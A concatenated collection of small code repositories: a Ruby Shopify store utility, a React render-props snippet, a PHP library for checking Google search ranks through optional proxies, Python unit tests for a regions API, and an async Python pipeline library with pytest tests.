opts.on("-f", "--type TYPE", String, "An item type. This option can be used many times.") do |type|
options.types.push(type)
end
opts.on_tail("-h", "--help", "This message.") do
puts opts
exit
end
end.parse!
def carefully
yield
rescue StandardError => error
puts
puts "Error message: #{error.message}"
puts "Error backtrace:"
puts error.backtrace
puts
puts"Couldn't complete task! :("
end
if options.store_uri.nil?
puts "Error! You need to provide a store URI! Use -h for help!"
exit
end
carefully do
processor = StoreProcessor.new(options.store_uri)
if options.types.empty?
processor.print_types
else
processor.get_filtered_total(options.types)
end
end
<file_sep># shopify-store-util
This is a small util used to get info on Shopify stores.
With this, you can:
1. Get a list of the various types of items of a store, e.g. `shopify-store-util.rb --store 'http://shopicruit.myshopify.com'`
2. Search a store for all items of given types, e.g. `shopify-store-util.rb --store 'http://shopicruit.myshopify.com' --types 'watch,clock'`
<file_sep>#!/usr/bin/ruby
require_relative 'StoreProcessor'
def with_error_printing
yield
rescue StandardError => error
puts "#{__method__}: #{error.message}"
puts "#{__method__} backtrace:"
puts error.backtrace
nil
end
with_error_printing do
StoreProcessor.new('http://shopicruit.myshopify.com/')
.get_filtered_total(%w(clocK wAtch))
end
with_error_printing do
StoreProcessor.new('http://google.com')
.get_filtered_total(%w(clocK wAtch))
end
# TODO: Split these into tests
# begin
# processor = StoreProcessor.new("nonsense")
# rescue ArgumentError
# p "Caught error!"
# end
#
# Types = [ "clock" ]
# processor.get_filtered_total(Types); puts
# processor.get_filtered_total([]); puts
# processor.get_filtered_total(['Elephants']); puts
# processor.get_filtered_total([ 'clock', 'watch' ]); puts
|
1ba9abd2ad98db96091943bed8aca68ad7c39895
|
[
"Markdown",
"Ruby"
] | 4
|
Ruby
|
froyomuffin/shopify-store-util
|
07a62aa581f790779d2fbbe3589c2ff93ae5fea3
|
ab5cabf709e54d0749bf5644c5810418c8597fbd
|
refs/heads/master
|
<repo_name>rimriahi14/render-props-examples<file_sep>/src/List.js
import React, { Component } from 'react';
class List extends Component {
render() {
const { render, children } = this.props;
return (
<>
{render && render({
users: [{ name: 'elin' }, { name: 'riahi' }]
})}
{children}
</>
)
}
}
export default List;<file_sep>/README.old.md
# render-props-examples
|
e0417cfb3242cf615dffb7f133174705e4861325
|
[
"JavaScript",
"Markdown"
] | 2
|
JavaScript
|
rimriahi14/render-props-examples
|
470743a1380eca6cd7f65b0127bccd1d576da42b
|
d54ee8f86517dbebd6ab242ba464b8afe8b537ec
|
refs/heads/master
|
<repo_name>marlemiesz/google-search-results<file_sep>/src/Response/Response.php
<?php
namespace Marlemiesz\GoogleSearchResult\Response;
class Response implements ResponseInterface
{
private ?int $rank = null;
private ?string $error_message = null;
/**
* Response constructor.
*/
public function __construct()
{
}
/**
* @return string|null
*/
public function getErrorMessage(): ?string
{
return $this->error_message;
}
/**
* @return int
*/
public function getRank(): ?int
{
return $this->rank;
}
public function setRank(?int $rank, ?string $message = null): void
{
if ($this->isRankCorrect($rank) && $message === null) {
$this->rank = $rank;
$this->error_message = null;
} else {
$this->rank = null;
$this->error_message = $message ?? 'Unable to get rank. Unknown Reason.';
}
}
private function isRankCorrect(?int $rank):bool
{
return
$rank !== null &&
$rank <= 100
;
}
}
<file_sep>/src/Proxy/ProxyInterface.php
<?php
namespace Marlemiesz\GoogleSearchResult\Proxy;
interface ProxyInterface
{
/**
* @return string
*/
public function getIp(): string;
/**
* @param string $ip
*/
public function setIp(string $ip): void;
/**
* @return string
*/
public function getPort(): string;
/**
* @param string $port
*/
public function setPort(string $port): void;
/**
* @return string
*/
public function getProtocol(): string;
/**
* @param string $protocol
*/
public function setProtocol(string $protocol): void;
public function getUrl(): string;
}
<file_sep>/tests/Request/RequestTest.php
<?php
namespace Marlemiesz\GoogleSearchResult\Tests\Request;
use Marlemiesz\GoogleSearchResult\Constants\GoogleDomain;
use Marlemiesz\GoogleSearchResult\Proxy\Proxy;
use Marlemiesz\GoogleSearchResult\Request\Request;
use Marlemiesz\GoogleSearchResult\Request\RequestInterface;
use Marlemiesz\GoogleSearchResult\Response\Response;
use PHPUnit\Framework\TestCase;
class RequestTest extends TestCase
{
public function testInterface()
{
$proxy = new Proxy('8.8.8.8', '8081', 'sock5');
$request = new Request('google.pl', new Response(), GoogleDomain::googlepl, $proxy, 'Warsaw');
$this->assertInstanceOf(RequestInterface::class, $request, "Request is not instance of RequestInterface");
}
public function testRequestResponse()
{
$request = new Request('world', new Response());
$request->setResponse(4);
$this->assertEquals(4, $request->getResponseRank());
$request->setResponse(101);
$this->assertEquals(null, $request->getResponseRank());
$this->assertIsString($request->getResponseError());
$error_message = 'Unable to find rank';
$request->setResponse(null, $error_message);
$this->assertEquals(null, $request->getResponseRank());
$this->assertEquals($error_message, $request->getResponseError());
}
}
<file_sep>/src/Response/ResponseInterface.php
<?php
namespace Marlemiesz\GoogleSearchResult\Response;
interface ResponseInterface
{
/**
* @return int
*/
public function getRank(): ?int;
/**
* @return string|null
*/
public function getErrorMessage(): ?string;
/**
* @param int $rank
* @param string|null $message
*/
public function setRank(?int $rank, ?string $message = null): void;
}
<file_sep>/src/RequestService/ServiceInterface.php
<?php
namespace Marlemiesz\GoogleSearchResult\RequestService;
use Marlemiesz\GoogleSearchResult\Parser\ParserInterface;
use Marlemiesz\GoogleSearchResult\Request\RequestInterface;
interface ServiceInterface
{
/**
* @param RequestInterface ...$request
* @param ParserInterface $parser
* @return array
*/
public function execute(ParserInterface $parser, RequestInterface ...$request): array;
}
<file_sep>/src/Constants/GoogleDomain.php
<?php
namespace Marlemiesz\GoogleSearchResult\Constants;
class GoogleDomain
{
const googlead = "google.ad";
const googleae = "google.ae";
const googlecomaf = "google.com.af";
const googlecomag = "google.com.ag";
const googlecomai = "google.com.ai";
const googleal = "google.al";
const googleam = "google.am";
const googlecoao = "google.co.ao";
const googlecomar = "google.com.ar";
const googleas = "google.as";
const googleat = "google.at";
const googlecomau = "google.com.au";
const googleaz = "google.az";
const googleba = "google.ba";
const googlecombd = "google.com.bd";
const googlebe = "google.be";
const googlebf = "google.bf";
const googlebg = "google.bg";
const googlecombh = "google.com.bh";
const googlebi = "google.bi";
const googlebj = "google.bj";
const googlecombn = "google.com.bn";
const googlecombo = "google.com.bo";
const googlecombr = "google.com.br";
const googlebs = "google.bs";
const googlebt = "google.bt";
const googlecobw = "google.co.bw";
const googleby = "google.by";
const googlecombz = "google.com.bz";
const googleca = "google.ca";
const googlecd = "google.cd";
const googlecf = "google.cf";
const googlecg = "google.cg";
const googlech = "google.ch";
const googleci = "google.ci";
const googlecock = "google.co.ck";
const googlecl = "google.cl";
const googlecm = "google.cm";
const googlecn = "google.cn";
const googlecomco = "google.com.co";
const googlecocr = "google.co.cr";
const googlecomcu = "google.com.cu";
const googlecv = "google.cv";
const googlecomcy = "google.com.cy";
const googlecz = "google.cz";
const googlede = "google.de";
const googledj = "google.dj";
const googledk = "google.dk";
const googledm = "google.dm";
const googlecomdo = "google.com.do";
const googledz = "google.dz";
const googlecomec = "google.com.ec";
const googleee = "google.ee";
const googlecomeg = "google.com.eg";
const googlees = "google.es";
const googlecomet = "google.com.et";
const googlefi = "google.fi";
const googlecomfj = "google.com.fj";
const googlefm = "google.fm";
const googlefr = "google.fr";
const googlega = "google.ga";
const googlege = "google.ge";
const googlegg = "google.gg";
const googlecomgh = "google.com.gh";
const googlecomgi = "google.com.gi";
const googlegl = "google.gl";
const googlegm = "google.gm";
const googlegr = "google.gr";
const googlecomgt = "google.com.gt";
const googlegy = "google.gy";
const googlecomhk = "google.com.hk";
const googlehn = "google.hn";
const googlehr = "google.hr";
const googleht = "google.ht";
const googlehu = "google.hu";
const googlecoid = "google.co.id";
const googleie = "google.ie";
const googlecoil = "google.co.il";
const googleim = "google.im";
const googlecoin = "google.co.in";
const googleiq = "google.iq";
const googleis = "google.is";
const googleit = "google.it";
const googleje = "google.je";
const googlecomjm = "google.com.jm";
const googlejo = "google.jo";
const googlecojp = "google.co.jp";
const googlecoke = "google.co.ke";
const googlecomkh = "google.com.kh";
const googleki = "google.ki";
const googlekg = "google.kg";
const googlecokr = "google.co.kr";
const googlecomkw = "google.com.kw";
const googlekz = "google.kz";
const googlela = "google.la";
const googlecomlb = "google.com.lb";
const googleli = "google.li";
const googlelk = "google.lk";
const googlecols = "google.co.ls";
const googlelt = "google.lt";
const googlelu = "google.lu";
const googlelv = "google.lv";
const googlecomly = "google.com.ly";
const googlecoma = "google.co.ma";
const googlemd = "google.md";
const googleme = "google.me";
const googlemg = "google.mg";
const googlemk = "google.mk";
const googleml = "google.ml";
const googlecommm = "google.com.mm";
const googlemn = "google.mn";
const googlems = "google.ms";
const googlecommt = "google.com.mt";
const googlemu = "google.mu";
const googlemv = "google.mv";
const googlemw = "google.mw";
const googlecommx = "google.com.mx";
const googlecommy = "google.com.my";
const googlecomz = "google.co.mz";
const googlecomna = "google.com.na";
const googlecomng = "google.com.ng";
const googlecomni = "google.com.ni";
const googlene = "google.ne";
const googlenl = "google.nl";
const googleno = "google.no";
const googlecomnp = "google.com.np";
const googlenr = "google.nr";
const googlenu = "google.nu";
const googleconz = "google.co.nz";
const googlecomom = "google.com.om";
const googlecompa = "google.com.pa";
const googlecompe = "google.com.pe";
const googlecompg = "google.com.pg";
const googlecomph = "google.com.ph";
const googlecompk = "google.com.pk";
const googlepl = "google.pl";
const googlepn = "google.pn";
const googlecompr = "google.com.pr";
const googleps = "google.ps";
const googlept = "google.pt";
const googlecompy = "google.com.py";
const googlecomqa = "google.com.qa";
const googlero = "google.ro";
const googleru = "google.ru";
const googlerw = "google.rw";
const googlecomsa = "google.com.sa";
const googlecomsb = "google.com.sb";
const googlesc = "google.sc";
const googlese = "google.se";
const googlecomsg = "google.com.sg";
const googlesh = "google.sh";
const googlesi = "google.si";
const googlesk = "google.sk";
const googlecomsl = "google.com.sl";
const googlesn = "google.sn";
const googleso = "google.so";
const googlesm = "google.sm";
const googlesr = "google.sr";
const googlest = "google.st";
const googlecomsv = "google.com.sv";
const googletd = "google.td";
const googletg = "google.tg";
const googlecoth = "google.co.th";
const googlecomtj = "google.com.tj";
const googletl = "google.tl";
const googletm = "google.tm";
const googletn = "google.tn";
const googleto = "google.to";
const googlecomtr = "google.com.tr";
const googlett = "google.tt";
const googlecomtw = "google.com.tw";
const googlecotz = "google.co.tz";
const googlecomua = "google.com.ua";
const googlecoug = "google.co.ug";
const googlecouk = "google.co.uk";
const googlecomuy = "google.com.uy";
const googlecouz = "google.co.uz";
const googlecomvc = "google.com.vc";
const googlecove = "google.co.ve";
const googlevg = "google.vg";
const googlecovi = "google.co.vi";
const googlecomvn = "google.com.vn";
const googlevu = "google.vu";
const googlews = "google.ws";
const googlers = "google.rs";
const googlecoza = "google.co.za";
const googlecozm = "google.co.zm";
const googlecozw = "google.co.zw";
const googlecat = "google.cat";
}
<file_sep>/src/Parser/ParserInterface.php
<?php
namespace Marlemiesz\GoogleSearchResult\Parser;
interface ParserInterface
{
public function parse(string $content);
}
<file_sep>/tests/Request/ProxyTest.php
<?php
namespace Marlemiesz\GoogleSearchResult\Tests\Request;
use Marlemiesz\GoogleSearchResult\Proxy\Proxy;
use Marlemiesz\GoogleSearchResult\Proxy\ProxyInterface;
use PHPUnit\Framework\TestCase;
class ProxyTest extends TestCase
{
public function testGetUrl()
{
$proxy = new Proxy('8.8.8.8', '8081', 'sock5');
$this->assertEquals('sock5://8.8.8.8:8081', $proxy->getUrl(), "Generated url by proxy isn't correct");
$proxy = new Proxy('8.8.8.8', '8081');
$this->assertEquals('tcp://8.8.8.8:8081', $proxy->getUrl(), "Default protocol in proxy is not tcp");
}
public function testInterface()
{
$proxy = new Proxy('8.8.8.8', '8081', 'sock5');
$this->assertInstanceOf(ProxyInterface::class, $proxy, "Proxy is not instance of ProxyInterface");
}
}
<file_sep>/src/Request/RequestInterface.php
<?php
namespace Marlemiesz\GoogleSearchResult\Request;
use Marlemiesz\GoogleSearchResult\Proxy\ProxyInterface;
interface RequestInterface
{
/**
* @return string|null
*/
public function getLocation(): ?string;
/**
* @param string|null $location
*/
public function setLocation(?string $location): void;
/**
* @return string
*/
public function getDomain(): string;
/**
* @param string $domain
*/
public function setDomain(string $domain): void;
/**
* @return string
*/
public function getQuery(): string;
/**
* @param string $query
*/
public function setQuery(string $query): void;
/**
* @return ProxyInterface|null
*/
public function getProxy(): ?ProxyInterface;
/**
* @param ProxyInterface|null $proxy
*/
public function setProxy(?ProxyInterface $proxy): void;
/**
* @param int|null $rank
* @param string|null $error_message
* @return void
*/
public function setResponse(?int $rank, ?string $error_message): void;
/**
* @return int
*/
public function getResponseRank(): ?int;
/**
* @return bool
*/
public function isResponseCorrect(): bool;
/**
* @return string|null
*/
public function getResponseError(): ?string;
}
<file_sep>/src/Parser/HtmlParser.php
<?php
namespace Marlemiesz\GoogleSearchResult\Parser;
class HtmlParser implements ParserInterface
{
public function parse(string $content)
{
}
}
<file_sep>/src/RequestService/AsyncService.php
<?php
namespace Marlemiesz\GoogleSearchResult\RequestService;
use Marlemiesz\GoogleSearchResult\Parser\ParserInterface;
use Marlemiesz\GoogleSearchResult\Request\RequestInterface;
class AsyncService implements ServiceInterface
{
public function execute(ParserInterface $parser, RequestInterface ...$request): array
{
// TODO: implement asynchronous execution of the requests.
return [];
}
}
<file_sep>/src/Proxy/Proxy.php
<?php
namespace Marlemiesz\GoogleSearchResult\Proxy;
class Proxy implements ProxyInterface
{
private string $ip;
private string $port;
private string $protocol;
/**
* Proxy constructor.
* @param string $ip
* @param string $port
* @param string $protocol
*/
public function __construct(string $ip, string $port, string $protocol = 'tcp')
{
$this->ip = $ip;
$this->port = $port;
$this->protocol = $protocol;
}
/**
* @return string
*/
public function getIp(): string
{
return $this->ip;
}
/**
* @param string $ip
*/
public function setIp(string $ip): void
{
$this->ip = $ip;
}
/**
* @return string
*/
public function getPort(): string
{
return $this->port;
}
/**
* @param string $port
*/
public function setPort(string $port): void
{
$this->port = $port;
}
/**
* @return string
*/
public function getProtocol(): string
{
return $this->protocol;
}
/**
* @param string $protocol
*/
public function setProtocol(string $protocol): void
{
$this->protocol = $protocol;
}
public function getUrl(): string
{
return sprintf("%s://%s:%s", $this->getProtocol(), $this->getIp(), $this->getPort());
}
}
<file_sep>/src/Client.php
<?php
namespace Marlemiesz\GoogleSearchResult;
use Marlemiesz\GoogleSearchResult\Request\RequestInterface;
class Client
{
/**
* @var RequestInterface[]
*/
protected array $requests = [];
/**
* Client constructor.
*/
public function __construct()
{
}
/**
* @param RequestInterface ...$requests
*/
public function addRequests(RequestInterface ...$requests)
{
$this->requests = array_merge($this->requests, $requests);
}
/**
* @param RequestInterface $request
*/
public function addRequest(RequestInterface $request)
{
$this->requests[] = $request;
}
public function execute(): void
{
}
}
<file_sep>/src/Request/Request.php
<?php
namespace Marlemiesz\GoogleSearchResult\Request;
use Marlemiesz\GoogleSearchResult\Proxy\ProxyInterface;
use Marlemiesz\GoogleSearchResult\Response\ResponseInterface;
class Request implements RequestInterface
{
private string $query;
private string $domain;
private ?string $location;
/**
* @var ?ProxyInterface
*/
private ?ProxyInterface $proxy;
/**
* @var ResponseInterface
*/
private ResponseInterface $response;
/**
* Request constructor.
* @param string $query
* @param ResponseInterface $response
* @param string $domain
* @param ?ProxyInterface $proxy
* @param string|null $location
*/
public function __construct(string $query, ResponseInterface $response, string $domain = 'google.com', ?ProxyInterface $proxy = null, ?string $location = null)
{
$this->query = $query;
$this->domain = $domain;
$this->location = $location;
$this->proxy = $proxy;
$this->response = $response;
}
/**
* @return string|null
*/
public function getLocation(): ?string
{
return $this->location;
}
/**
* @param string|null $location
*/
public function setLocation(?string $location): void
{
$this->location = $location;
}
/**
* @return string
*/
public function getDomain(): string
{
return $this->domain;
}
/**
* @param string $domain
*/
public function setDomain(string $domain): void
{
$this->domain = $domain;
}
/**
* @return string
*/
public function getQuery(): string
{
return $this->query;
}
/**
* @param string $query
*/
public function setQuery(string $query): void
{
$this->query = $query;
}
/**
* @return ProxyInterface|null
*/
public function getProxy(): ?ProxyInterface
{
return $this->proxy;
}
/**
* @param ProxyInterface|null $proxy
*/
public function setProxy(?ProxyInterface $proxy): void
{
$this->proxy = $proxy;
}
/**
* @param int|null $rank
* @param string|null $error_message
* @return void
*/
public function setResponse(?int $rank, ?string $error_message = null): void
{
$this->response->setRank($rank, $error_message);
}
/**
* @return int
*/
public function getResponseRank(): ?int
{
return $this->response->getRank();
}
/**
* @return bool
*/
public function isResponseCorrect(): bool
{
return $this->response->getErrorMessage() === null;
}
/**
* @return string|null
*/
public function getResponseError(): ?string
{
return $this->response->getErrorMessage();
}
}
|
4040e23a36cbc3fa6b383cf187875fd95f10570b
|
[
"PHP"
] | 14
|
PHP
|
marlemiesz/google-search-results
|
955238c9dcf62c9808a0b228f964147ac35d02fe
|
58c6a09a7a1c7423c9dc8d75780e732bf8d373a9
|
refs/heads/main
|
<repo_name>arzamastsevya/SDET-03<file_sep>/test07.py
import unittest
import json
from urllib import request
from urllib.parse import quote
from config import test_config
# {server_name}/{API_ver}/regions?q=
# checks the error message when the 'q' parameter is shorter than 3 characters
class TestCase(unittest.TestCase):
API_name = "regions"
query_param = "?q="
query_value = ""
#def setUp(self):
def test_case_07(self):
URL = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name + self.query_param + format(quote(self.query_value))
res = request.urlopen(URL, timeout=test_config.response_timeout)
body = json.loads(res.read().decode("utf8"))
assert body["error"], f"\n{URL}\nIncorrect error message"
assert body["error"]["id"], f"\n{URL}\nIncorrect error message"
assert body["error"]["message"]=="Параметр 'q' должен быть не менее 3 символов", f"\n{URL}\nIncorrect error message"
#def tearDown(self):
if __name__ == "__main__":
unittest.main()<file_sep>/config.py
class test_config:
server_name = "https://regions-test.2gis.com"
API_ver = "1.0"
response_timeout = 10<file_sep>/test14.py
import unittest
import json
from urllib import request
from urllib.parse import quote
from config import test_config
# {server_name}/{API_ver}/regions?page=1
# checks that cities returned on different
# pages are not duplicated
class TestCase(unittest.TestCase):
API_name = "regions"
query_param = "?page="
query_value = "1"
#def setUp(self):
def test_case_14(self):
page = 1
body_2 = {"items":""}
while body_2["items"] != [] and page <= 5:
URL_1 = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name + self.query_param + str(page)
res = request.urlopen(URL_1, timeout=test_config.response_timeout)
body_1 = json.loads(res.read().decode("utf8"))
#print(URL_1)
#print(body_1, "\n")
URL_2 = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name + self.query_param + str(page+1)
res = request.urlopen(URL_2, timeout=test_config.response_timeout)
body_2 = json.loads(res.read().decode("utf8"))
#print(URL_2)
#print(body_2, "\n")
if body_2["items"]!=[]:
for i in body_1["items"]:
#print(i, (i not in body_2["items"]))
assert i not in body_2["items"], f"\n{URL_1}\n{URL_2}\nDuplicated value\n{i}"
#print("\n")
page += 1
#def tearDown(self):
if __name__ == "__main__":
unittest.main()<file_sep>/test03.py
import unittest
import json
from urllib import request
from urllib.parse import quote
from config import test_config
# {server_name}/{API_ver}/regions?q=рск
# checks search by a valid substring
class TestCase(unittest.TestCase):
API_name = "regions"
query_param = "?q="
query_value = "рск"
#def setUp(self):
def test_case_03(self):
URL = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name + self.query_param + format(quote(self.query_value))
res = request.urlopen(URL, timeout=test_config.response_timeout)
body = json.loads(res.read().decode("utf8"))
#print(body)
for i in body["items"]:
assert self.query_value.lower() in i["name"].lower(), f"\n{URL}\nNot found {self.query_value}"
#def tearDown(self):
if __name__ == "__main__":
unittest.main()<file_sep>/test20.py
import unittest
import json
from urllib import request
from urllib.error import HTTPError
from urllib.parse import quote
from config import test_config
# {server_name}/{API_ver}/regions?page_size=5
# checks that the number of returned elements
# matches the page_size parameter value
class TestCase(unittest.TestCase):
API_name = "regions"
query_param = "?page_size="
query_value = "5"
#def setUp(self):
def test_case_20(self):
URL = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name + self.query_param + format(quote(self.query_value))
res = request.urlopen(URL, timeout=test_config.response_timeout)
body = json.loads(res.read().decode("utf8"))
assert str(len(body["items"])) == self.query_value, f"\n{URL}\nThe number of elements is not {self.query_value}"
#def tearDown(self):
if __name__ == "__main__":
unittest.main()<file_sep>/test10.py
import unittest
import json
from urllib import request
from urllib.parse import quote
from config import test_config
# {server_name}/{API_ver}/regions?country_code=kg
# checks that every returned region has the requested country_code
class TestCase(unittest.TestCase):
API_name = "regions"
query_param = "?country_code="
query_value = "kg"
#def setUp(self):
def test_case_10(self):
page = 1
body={"items": ""}
while body["items"] != [] and page <= 5:
URL = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name + self.query_param + format(quote(self.query_value)) + "&page=" + str(page)
res = request.urlopen(URL, timeout=test_config.response_timeout)
body = json.loads(res.read().decode("utf8"))
page += 1
#print(URL)
#print(body, "\n")
for i in body["items"]:
#print(i["country"]["code"])
assert self.query_value.lower() == i["country"]["code"], f"Not found {self.query_value} \n {URL}"
#def tearDown(self):
if __name__ == "__main__":
unittest.main()<file_sep>/test01.py
import unittest
import json
from urllib import request
from config import test_config
# {server_name}/{API_ver}/regions
# checks the data structure of the response
# checks that the default page_size is 15
# checks that "total" > 0
class TestCase(unittest.TestCase):
API_name = "regions"
#def setUp(self):
def test_case_01(self):
URL = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name
res = request.urlopen(URL, timeout=test_config.response_timeout)
body = json.loads(res.read())
items = len(body["items"])
        assert items == 15, f"\n{URL}\nIncorrect default number of items: expected 15, got {items}"
        assert "total" in body, f"\n{URL}\nNo \"total\" in response"
        assert body["total"] > 0, f"\n{URL}\n\"total\" is not greater than 0"
assert "items" in body
assert "id" in body["items"][0]
assert "name" in body["items"][0]
assert "code" in body["items"][0]
assert "name" in body["items"][0]["country"]
assert "code" in body["items"][0]["country"]
#def tearDown(self):
if __name__ == "__main__":
unittest.main()<file_sep>/test19.py
import unittest
import json
from urllib import request
from urllib.error import HTTPError
from urllib.parse import quote
from config import test_config
# {server_name}/{API_ver}/regions?page=1
# checks that page=1 is the default
class TestCase(unittest.TestCase):
API_name = "regions"
query_param = "?page="
query_value = "1"
#def setUp(self):
def test_case_19(self):
URL_01 = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name
#print(URL)
res = request.urlopen(URL_01, timeout=test_config.response_timeout)
body_01 = json.loads(res.read().decode("utf8"))
URL_02 = test_config.server_name + "/" + test_config.API_ver + "/" + self.API_name + self.query_param + format(quote(self.query_value))
#print(URL)
res = request.urlopen(URL_02, timeout=test_config.response_timeout)
body_02 = json.loads(res.read().decode("utf8"))
        assert body_01 == body_02, f"\n{URL_01}\n{URL_02}\nPage 1 is not the default"
#def tearDown(self):
if __name__ == "__main__":
unittest.main()
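# --- Hedged sketch (not part of the original test suite) ---
# The paginated tests above (test_case_10, test_case_14) repeat the same
# "fetch pages until the items list is empty or a page cap is reached" loop.
# A helper like the one below could consolidate that pattern. The name
# iterate_pages and the max_pages cap are illustrative assumptions only.
import json
from urllib import request
from config import test_config

def iterate_pages(api_name, query="", max_pages=5):
    """Yield (url, body) for successive pages until "items" is empty or the cap is hit."""
    page = 1
    while page <= max_pages:
        separator = "&" if query else "?"
        url = (test_config.server_name + "/" + test_config.API_ver + "/"
               + api_name + query + separator + "page=" + str(page))
        res = request.urlopen(url, timeout=test_config.response_timeout)
        body = json.loads(res.read().decode("utf8"))
        if body["items"] == []:
            break
        yield url, body
        page += 1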
| cfca36816f783f2b267514d758d7784250c9d531 | ["Python"] | 8 | Python | arzamastsevya/SDET-03 | 2c4c6a7a1defd29346c04823a7fa76766d287a78 | e10357e7f4d14637a4b5ebae6c174c59782f1e82 | refs/heads/master |
<file_sep>import logging
from typing import Callable, Type, Dict, List, Tuple, Iterable
from asyncio import Queue, create_task, gather, run as async_run
logging.basicConfig(
format="%(asctime)s | %(levelname)s | %(name)s | "
"%(funcName)s | %(message)s"
)
logger = logging.getLogger("turbine")
# TODO Topology validation.
def identity(x):
return x
class Stop:
pass
class Fail(Stop):
def __init__(self, exc: Type[Exception], msg: str):
self.exc: Type[Exception] = exc
self.msg: str = msg
def raise_exc(self):
raise self.exc(self.msg)
class Turbine:
def __init__(self, debug=False):
# Entry point for loading the topology.
self.entry_point: Callable = None
# Map of channel names to their queues.
# Initialized within the event loop.
self._channels: Dict[str, Queue] = {}
# Map of channel to the number of running tasks.
# Used to shut the topology down.
self._channel_num_tasks: Dict[str, int] = {}
# List of tasks to be run.
# Used to start the tasks in the event loop.
self._tasks: List[Callable] = []
# Flag indicating the status of the topology.
# This is used to terminate loading.
self._topology_running: bool = False
# Entry point for the topology.
self._entry_point: Callable = None
if debug:
logger.setLevel("DEBUG")
logger.debug("Logger set to debug.")
def _log_topology_status(self):
queue_statuses = " | ".join(
[
f"{c}: {q._unfinished_tasks}/{q.qsize()}"
for c, q in self._channels.items()
]
)
queue_tasks = " | ".join(
[f"{c}: {n}" for c, n in self._channel_num_tasks.items()]
)
logger.debug(f"Queue statuses: {queue_statuses}.")
logger.debug(f"Queue tasks: {queue_tasks}.")
logger.debug(f"Topology running: {self._topology_running}.")
async def _fail_topology(self, fail: Fail) -> None:
for channel, queue in self._channels.items():
# This particular move is grimey. There's no "sanctioned" way to
# clear these queues so we have to rely on internal implementation.
queue._queue.clear() # type: ignore
queue._unfinished_tasks = 0 # type: ignore
self._topology_running = False
for _ in range(self._channel_num_tasks[channel]):
await queue.put(fail)
        logger.debug("Queues cleared and fails placed.")
self._log_topology_status()
async def _stop_downstream(
self, downstream_channels: List[str], stopper: Stop
) -> None:
for channel in downstream_channels:
for _ in range(self._channel_num_tasks[channel]):
await self._channels[channel].put(stopper)
def _add_channels(self, channels: List[Tuple[str, int]]) -> None:
for channel, tasks in channels:
self._channel_num_tasks[channel] = tasks
async def _source(
self, outbound_channel: str, f: Callable, *args, **kwargs
) -> None:
if len(args) > 1 or not isinstance(args[0], Stop):
value = f(*args, **kwargs)
await self._channels[outbound_channel].put(value)
else:
await self._stop_downstream([outbound_channel], args[0])
def source(self, outbound_channel: str) -> Callable:
def decorator(f: Callable = identity) -> Callable:
async def entry_point(*args, **kwargs):
try:
await self._source(outbound_channel, f, *args, **kwargs)
except Exception as e:
logger.exception(f"Source got exception {e}.")
await self._fail_topology(Fail(type(e), str(e)))
self._entry_point = entry_point
return f
return decorator
async def _sink(self, inbound_channel: str, f: Callable) -> Stop:
inbound_queue = self._channels[inbound_channel]
while True:
value = await inbound_queue.get()
if isinstance(value, Stop):
logger.debug(f"Sink got a stop: {value}.")
inbound_queue.task_done()
self._channel_num_tasks[inbound_channel] -= 1
return value
else:
f(value)
inbound_queue.task_done()
def sink(self, inbound_channel: str, num_tasks: int = 1) -> Callable:
self._channel_num_tasks[inbound_channel] = num_tasks
self._add_channels([(inbound_channel, num_tasks)])
def decorator(f: Callable) -> Callable:
async def sink_task() -> Stop:
try:
return await self._sink(inbound_channel, f)
except Exception as e:
logger.exception("sink got an exception.")
fail = Fail(type(e), str(e))
self._channel_num_tasks[inbound_channel] -= 1
await self._fail_topology(fail)
return fail
for _ in range(num_tasks):
self._tasks.append(sink_task)
return f
return decorator
async def _run_tasks(self, seq: Iterable) -> None:
# First create the channels.
logger.debug("Creating channels.")
self._channels = {
c: Queue(maxsize=s) for c, s in self._channel_num_tasks.items()
}
# Create the tasks.
logger.debug("Launching tasks.")
running_tasks = [create_task(t()) for t in self._tasks]
self._topology_running = True
self._log_topology_status()
# Load the entry point.
for s in seq:
if self._topology_running:
await self._entry_point(s)
# Now stop the topology.
if self._topology_running:
await self._entry_point(Stop())
# Check the status of the completed tasks.
completed_tasks = await gather(*running_tasks)
for t in completed_tasks:
if isinstance(t, Fail):
t.raise_exc()
def run(self, seq: Iterable) -> None:
self._log_topology_status()
async_run(self._run_tasks(seq))
<file_sep>import pytest
from turbine import Turbine
def identity(x):
return x
@pytest.fixture
def topology():
return Turbine(debug=True)
def test_source_sink(topology):
@topology.source("input")
def identity(x):
return x
sinker = []
@topology.sink("input")
def sink(x):
sinker.append(x)
data = ["a", "b", "c"]
topology.run(data)
assert sinker == data
def test_source_sink_multitask(topology):
@topology.source("input")
def identity(x):
return x
sinker = []
@topology.sink("input", num_tasks=2)
def sink(x):
sinker.append(x)
data = ["a", "b", "c"]
topology.run(data)
assert sinker == data
def test_source_exception(topology):
@topology.source("input")
def oops(x):
raise ValueError("my bad")
@topology.sink("input")
def nope(x):
print(x)
data = ["it", "doesn't", "matter"]
with pytest.raises(ValueError) as e:
topology.run(data)
    assert str(e.value) == "my bad"
def test_scatter(topology):
@topology.source("input")
def identity(x):
return x
sinker1 = []
sinker2 = []
@topology.scatter("input", ["output_1", "output_2"])
def scatter(x):
return x + "!"
@topology.sink("output_1")
def sink1(x):
sinker1.append(x)
@topology.sink("output_2")
def sink2(x):
sinker2.append(x)
data = ["a", "b", "c"]
topology.run(data)
truth = ["a!", "b!", "c!"]
assert truth == sinker1
assert truth == sinker2
def test_scatter_multitask(topology):
@topology.source("input")
def identity(x):
return x
sinker1 = []
sinker2 = []
@topology.scatter("input", ["output_1", "output_2"], num_tasks=2)
def scatter(x):
return x + "!"
@topology.sink("output_1", num_tasks=2)
def sink1(x):
sinker1.append(x)
@topology.sink("output_2")
def sink2(x):
sinker2.append(x)
data = ["a", "b", "c"]
topology.run(data)
truth = ["a!", "b!", "c!"]
assert truth == sinker1
assert truth == sinker2
def test_scatter_exception(topology):
@topology.source("input")
def identity(x):
return x
@topology.scatter("input", ["output_1", "output_2"])
def scatter(x):
raise ValueError("my bad")
@topology.sink("output_1")
def sink_1(x):
print(x)
@topology.sink("output_2")
def sink_2(x):
print(x)
data = ["it", "doesn't", "matter"]
with pytest.raises(ValueError) as e:
topology.run(data)
    assert str(e.value) == "my bad"
def test_gather(topology):
